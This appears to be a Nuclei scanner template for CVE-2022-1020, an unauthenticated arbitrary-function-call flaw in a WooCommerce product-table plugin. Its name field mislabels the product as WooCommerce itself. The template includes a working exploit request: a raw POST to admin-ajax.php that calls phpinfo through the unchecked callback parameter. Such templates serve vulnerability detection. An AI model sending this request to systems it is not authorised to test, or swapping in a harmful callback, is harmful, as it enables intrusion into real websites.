id: CVE-2022-1020 info: name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call author: Akincibor severity: critical description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument. remediation: | Update WordPress WooCommerce plugin to version 3.1.2 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5 - https://nvd.nist.gov/vuln/detail/CVE-2022-1020 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1020 cwe-id: CWE-352 epss-score: 0.0095 epss-percentile: 0.8144 cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: codeastrology product: woo_product_table framework: wordpress tags: wpscan,wp,wp-plugin,wordpress,cve,cve2022,unauth http: - raw: - | POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded option_key=a&perpose=update&callback=phpinfo matchers-condition: and matchers: - type: word words: - "PHP Extension" - "PHP Version" condition: and - type: status status: - 200 extractors: - type: regex group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' part: body